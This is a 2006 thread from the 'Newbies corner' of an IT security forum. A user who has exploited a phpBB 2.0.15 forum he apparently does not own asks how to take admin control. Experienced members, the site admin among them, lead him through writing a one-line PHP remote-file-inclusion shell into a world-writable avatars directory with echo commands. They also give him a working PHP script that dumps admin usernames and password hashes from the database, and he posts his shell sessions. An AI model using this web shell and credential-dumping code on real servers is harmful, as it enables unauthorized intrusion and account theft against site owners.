Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 10, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 385
Members: 0
Total: 385
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> PLEASE HELP, don't know where to post!! :( (phpBB 2015) Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PLEASE HELP, don't know where to post!! :( (phpBB 2015)
PostPosted: Thu Jun 01, 2006 4:01 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




Hello all first,
I'm reading this forum for a month or so trying to get a solution to hack a phpBB 2.0.15 forum...
Finlly found this exploit http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl , figured out Perl allso, and the exploit works, after execution, ls comand works.
So the only thing I found on this forum was to "cat config.php"

so I did, and end up wit:
<?php

2


2


29
// phpBB 2.x auto-generated confi

29
// Do not change anything in this

2


12
$dbms = 'mysql';

2


18
$dbhost = 'localhost';

16
$dbname = 'theforumdbname';

16
$dbuser = 'thedbuser';

18
$dbpasswd = 'thedbpass';

2


1b
$table_prefix = 'phpbb_';

2


22
define('PHPBB_INSTALLED', true);

Ok, so now i have theforumdbname, thedbuser and thedbpass ... and? what to do next?
I see that the sql connection must be from localhost, but i don't have access to the server where the forum is hosted, and i don't know the phpmyadmin login page.
I'm pretty sure that the 'wget' command is disabled or something, because wgeting smth doesent work but "wget --version" does...
So I'm kinda stuck, and didn't find any answers on this forum, neighter on google...
If anyone can help me, I thank you in advance!
PS: Sorry for the poor english...
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 4:20 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




First, figure out in which directories you can write. Then write a shell or a script which connects to MySQL and prints you the username+hash.
What does "uname -a" and "id" say? And if it is *BSD you can also try "fetch" instead of "wget".

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
...
PostPosted: Thu Jun 01, 2006 4:33 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




1. theforumdbname, thedbuser and thedbpass, I have replaced them on this post, in fact that exploit had shown me the real ones.
2. ls -l get's this:

phpBB2.0.15> ls -l

a
total 385

36
drwxr-xr-x 2 32028 web-user 736 Oct 20 2005 admin

36
drwxr-xr-x 2 32028 web-user 112 Oct 20 2005 cache

3b
-rw-r--r-- 1 32028 web-user 6726 Feb 17 13:17 common.php

3b
-rw-r--r-- 1 32028 web-user 276 May 16 18:09 config.php

33
drwxr-xr-x 3 32028 web-user 320 Feb 21 01:33 db

35
drwxr-xr-x 2 32028 web-user 296 Oct 20 2005 docs

3e
-rw-r--r-- 1 32028 web-user 810 Feb 17 13:17 extension.inc

38
-rw-r--r-- 1 32028 web-user 3643 Feb 17 13:17 faq.php

3c
-rw-r--r-- 1 32028 web-user 45673 Feb 17 13:17 groupcp.php

37
drwxr-xr-x 4 32028 web-user 160 Oct 20 2005 images

39
drwxr-xr-x 2 32028 web-user 976 Oct 20 2005 includes

3a
-rw-r--r-- 1 32028 web-user 14515 Feb 17 13:17 index.php

41
-rw-r--r-- 1 32028 web-user 523 Feb 15 17:47 index_avarie.php

39
drwxr-xr-x 4 32028 web-user 144 Oct 20 2005 language

3a
-rw-r--r-- 1 32028 web-user 7748 Feb 17 13:17 login.php

3f
-rw-r--r-- 1 32028 web-user 12150 Feb 17 13:17 memberlist.php

3a
-rw-r--r-- 1 32028 web-user 37796 Feb 17 13:17 modcp.php

3c
-rw-r--r-- 1 32028 web-user 34445 Feb 17 13:17 posting.php

3c
-rw-r--r-- 1 32028 web-user 72541 Feb 17 13:17 privmsg.php

3c
-rw-r--r-- 1 32028 web-user 3947 Feb 17 13:17 profile.php

3b
-rw-r--r-- 1 32028 web-user 43265 Feb 17 13:17 search.php

3a
drwxr-xr-x 3 32028 web-user 112 Oct 20 2005 templates

3e
-rw-r--r-- 1 32028 web-user 23154 Feb 17 13:17 viewforum.php

3f
-rw-r--r-- 1 32028 web-user 7233 Feb 17 13:17 viewonline.php

3e
-rw-r--r-- 1 32028 web-user 45228 Feb 17 13:17 viewtopic.php

f
phpBB2.0.15>

So you tell me wich one i can write....

uname -a:

9d
Linux web-hosting2.provider 2.6.15-vs2.0.1-gentoo-r5 #1 SMP PREEMPT Wed May 17
11:02:29 EEST 2006 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux

f
phpBB2.0.15>

And i have another problem, i forgot about, the cd command doesent work, i can ls though dir's or files withinn dir's.
Any ideea?
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 6:47 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




I told you to execute "id". With this information you can look, which directories are writable for your user; otherwise look for chmod 777 (google, how to find it... e.g. /images/avatars).
1.: I know.
3.: In almost all linux utilities you can give the absolute path as parameter, so "pwd". Wink

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
ok...
PostPosted: Thu Jun 01, 2006 7:20 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




chmod 777 - no efect what so ever, i think you must be admin-loged in order for that to work

the pwd result:

phpBB2.0.15> pwd

27
/hosting/www/www.domain.com-docs/forum

f
phpBB2.0.15>

the id result:

f
phpBB2.0.15> id

30
uid=81(apache) gid=81(apache) groups=81(apache)

and allso, horray!!! ^^^:

f
phpBB2.0.15> ls images -l

9
total 13

37
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars

!!!
But what now? Confused
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 8:22 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




So you have php scripting level access + shell commands execution possibilities. Now you must write some simple upload php script directly to webserver (example - use 'echo "<php?....blablabla..." >> /hosting/www/www.domain.com-docs/forum/myupload.php' commands). And with upload script just upload whatever you need for next step - like root exploit, written in c language (if gcc is avaliable).
But as it seems to be shared (virtual) hosting, then I don't believe, that you can get that b0x r00ted Wink

Anyway - try "cat /proc/version" - for determine kernel version Smile
View user's profile Send private message Send e-mail Visit poster's website
hmm...
PostPosted: Thu Jun 01, 2006 8:27 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




ok, thanks waraxe for noticeing me... but... i'm posting under the n00b section... you've got me all confused now... where to write the script? and how to upload it... anyway... i just want admin privileges on the forum...
sorry... but if you have some time, please explain more...
sorry again if i'm bothering you...
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 8:37 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




* Sory for the multi-post, but just tryied this:
Obviously the 'avatars' dir within the 'images' one has chmod 777:

phpBB2.0.15> ls images -l

9
total 13

37
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars

39
-rw-r--r-- 1 32028 web-user 169 Oct 20 2005 index.htm

36
drwxr-xr-x 4 32028 web-user 872 Feb 21 01:20 smiles

3a
-rw-r--r-- 1 32028 web-user 807 Oct 20 2005 spacer.gif

f
phpBB2.0.15>





* So I try to upload some text file on the webserver:



f
phpBB2.0.15> wget http://mydomain.com/loghin/l.txt images/avatars/

f
phpBB2.0.15>


* And end up with nothing, 'cat' does nothing:



11
phpBB2.0.15> cat images/avatars/l.txt

f
phpBB2.0.15>


* And the avatars folder is full with jpegs:


f
phpBB2.0.15> ls images/avatars




* I'm doing something wrong? What else is there to do ?
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 9:05 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Ok, i suggest to try to write 1 line long php script to webserver.
Maybe to avatars directory?
This php script contains only one line:

Code:

<?php include($r);?>


or

Code:

<?php include(stripslashes($_GET['r']));?>


How to write this script to server?
Try first some simple text file with "echo" command..
Like:

Code:

echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt


and if it works, you can see text file:

http://www.domain.com/forum/images/avatars/test.txt

In this way you can add text line by line to file!

And finally - when you have that one-line php script working, you can try:

http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com

... and hopefully you will see yahoo page ...

This gives you possibility for remote file inclusion. So you can put some bigger php script to your own server and execute it in victim server.
Very simple script for admin password dumping:

Code:

<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>


I wrote that and tested within 5 minutes and it works as expected;
Upload this script to your own server, then

http://www.domain.com/forum/images/avatars/test.php?r=http://www.yourownserver.com/myscript.php

and you will see first admin's username and password md5 hash, encountered in database.

Of course, you can write this bigger script right to victim server, passing remote inclusion tricks. It's your choice ...

Smile
View user's profile Send private message Send e-mail Visit poster's website
hmm...
PostPosted: Thu Jun 01, 2006 9:34 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




ok, so,
Code:
echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt

makes the txt file but it contains the word test written several times, like this:
Code:
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test


never the les, the command:

Code:
echo "<?php include(stripslashes($_GET['r']));?>" >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.php


indeed creates the test.php fille, and after 'cat'-ing the images/avatars/test.php , i see the:

Code:
<?php include(stripslashes($_GET['r']));?>


written several times, and allso

Code:
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com


doesen't work...
I know this is the right track, but what now?
View user's profile Send private message
PostPosted: Thu Jun 01, 2006 9:43 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Probably "allow_url_fopen=0" Smile

Hmm, so you can try to construct this script:

Code:

<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>


line by line.

As you know, "echo bla > x.txt" creates or overwrites file,
but "echo bla >> x.txt" adds one line to file. So you can build script line by line.
View user's profile Send private message Send e-mail Visit poster's website
back...
PostPosted: Sat Jun 03, 2006 1:51 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




Sorry, but i had some ISP trouble and no internet connection...
Tryied again to connect to that forum, and worked, but the ls, cat, rm (only ones i've tested) commands doesent work anymore.
So i've echo a test.txt file where i knew was the chmd 777 (images/avatars), and when tryied to display it (http://theadress.com/forum/images/avatars/test.txt) worked!
So tryied this:
Code:

f
phpBB2.0.15> echo "<?php" >> /hosting/www/www.site.com-docs/forum/images/avata
rs/test.php

f
phpBB2.0.15> echo "error_reporting(E_ALL);" >> /hosting/www/www.site.com-docs/
forum/images/avatars/test.php

f
phpBB2.0.15> echo "include('config.php');" >> /hosting/www/www.site.com-docs/f
orum/images/avatars/test.php

f
phpBB2.0.15> echo "$h=mysql_connect($dbhost,$dbuser,$dbpasswd);" >> /hosting/www
/www.site.com-docs/forum/images/avatars/test.php

f
phpBB2.0.15> echo "mysql_select_db($dbname,$h);" >> /hosting/www/www.site.com-
docs/forum/images/avatars/test.php

f
phpBB2.0.15> echo "$res=mysql_query("SELECT username,user_password FROM ".$table
_prefix."users WHERE user_level=1",$h);" >> /hosting/www/www.site.com-docs/for
um/images/avatars/test.php

f
phpBB2.0.15> echo "$row=mysql_fetch_row($res);" >> /hosting/www/www.site.com-d
ocs/forum/images/avatars/test.php

f
phpBB2.0.15> echo "$un=$row[0];$pw=$row[1];" >> /hosting/www/www.site.com-docs
/forum/images/avatars/test.php

f
phpBB2.0.15> echo "echo "$un:$pw";" >> /hosting/www/www.site.com-docs/forum/im
ages/avatars/test.php

f
phpBB2.0.15> echo "?> " >> /hosting/www/www.site.com-docs/forum/images/avatars
/test.php

f
phpBB2.0.15>


but, what do you know? http://theadress.com/forum/images/avatars/test.php doesen't do nothing... Sad

I don't know what's happened from 2 days ago and why those commands don't work, and I allso don't know what am I doing wrong with the php code...
Code:

<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>

Do I need to replace smth in the code? Because I had written it like it is...


Isn't there anything else I can do? Maybe use theforumdbname, thedbuser and thedbpass some how?
View user's profile Send private message
PostPosted: Sat Jun 03, 2006 2:39 pm Reply with quote
Chb
Valuable expert
Valuable expert
 
Joined: Jul 23, 2005
Posts: 206
Location: Germany




Yes, you have to change it.
If you knew, what you have been copying, you would know that "config.php" is included. And where is it? I'm sure, that it isn't in "images/avatars"... So set the path via ".." or use the absolute path.

_________________
www.der-chb.de
View user's profile Send private message Visit poster's website ICQ Number
PostPosted: Sat Jun 03, 2006 2:49 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




Chb wrote:
Yes, you have to change it.
If you knew, what you have been copying, you would know that "config.php" is included. And where is it? I'm sure, that it isn't in "images/avatars"... So set the path via ".." or use the absolute path.


I don't, remember? "Newbies corner".... Smile
So please tell me, I understand that I need to change this line:
Code:
include('config.php');


withe one of this (?):

Code:
include('/hosting/www/www.site.com-docs/forum/config.php');

Code:
include('http://www.site.com/forum/config.php');

?
And if so do I need to include the adress (wich one?) between
Code:
"
?

Thanks all for all the help, and I hope you'll answer me once more...
View user's profile Send private message
PostPosted: Sat Jun 03, 2006 2:59 pm Reply with quote
utilizator
Regular user
Regular user
 
Joined: Jun 01, 2006
Posts: 11




ok, replaced one line,
Code:
include('config.php');
with
Code:
include('http://site.com/forum/config.php');
nothing happens eighter...
View user's profile Send private message
PLEASE HELP, don't know where to post!! :( (phpBB 2015)
  www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.084 Seconds